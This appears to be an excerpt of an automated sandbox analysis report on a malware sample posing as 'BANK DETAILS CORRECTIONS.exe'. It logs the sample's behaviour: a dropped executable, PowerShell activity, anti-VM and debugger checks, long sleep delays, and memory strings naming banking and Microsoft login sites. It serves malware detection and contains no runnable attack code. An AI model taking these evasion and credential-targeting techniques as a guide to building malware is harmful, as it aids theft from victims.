                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: fcLfLlfpmjf.exe PID: 7212, type: MEMORYSTR
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: 4DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: 7FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: 8FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: 92A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: A2A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 73C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 83C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 8660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory allocated: 9660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0196096E rdtsc 12_2_0196096E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1221Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2743Jump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeWindow / User API: threadDelayed 1788
                Source: C:\Windows\SysWOW64\sdiagnhost.exeWindow / User API: threadDelayed 8184
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeAPI coverage: 1.4 %
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe TID: 7640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 1221 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe TID: 5668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788Thread sleep count: 1788 > 30
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788Thread sleep time: -3576000s >= -30000s
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788Thread sleep count: 8184 > 30
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788Thread sleep time: -16368000s >= -30000s
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920Thread sleep time: -85000s >= -30000s
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920Thread sleep time: -54000s >= -30000s
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdiagnhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdiagnhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: DC886F4.21.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: DC886F4.21.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: DC886F4.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: DC886F4.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: DC886F4.21.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: DC886F4.21.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: DC886F4.21.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: DC886F4.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: DC886F4.21.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: DC886F4.21.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.0000000002696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: DC886F4.21.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: DC886F4.21.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: DC886F4.21.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1303137425.0000000007540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: DC886F4.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: DC886F4.21.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: DC886F4.21.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: DC886F4.21.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: DC886F4.21.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: DC886F4.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: DC886F4.21.drBinary or memory string: global block list test formVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: EnKifmZDGZ.exe, 00000019.00000002.3733293559.000000000105F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                Source: DC886F4.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: DC886F4.21.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: DC886F4.21.drBinary or memory string: discord.comVMware20,11696501413f
                Source: DC886F4.21.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0196096E rdtsc 12_2_0196096E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00418C03 LdrLoadDll,12_2_00418C03
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A019F mov eax, dword ptr fs:[00000030h]12_2_019A019F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A019F mov eax, dword ptr fs:[00000030h]12_2_019A019F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A019F mov eax, dword ptr fs:[00000030h]12_2_019A019F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A019F mov eax, dword ptr fs:[00000030h]12_2_019A019F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191A197 mov eax, dword ptr fs:[00000030h]12_2_0191A197
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191A197 mov eax, dword ptr fs:[00000030h]12_2_0191A197
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191A197 mov eax, dword ptr fs:[00000030h]12_2_0191A197
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01960185 mov eax, dword ptr fs:[00000030h]12_2_01960185
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DC188 mov eax, dword ptr fs:[00000030h]12_2_019DC188
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DC188 mov eax, dword ptr fs:[00000030h]12_2_019DC188
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C4180 mov eax, dword ptr fs:[00000030h]12_2_019C4180
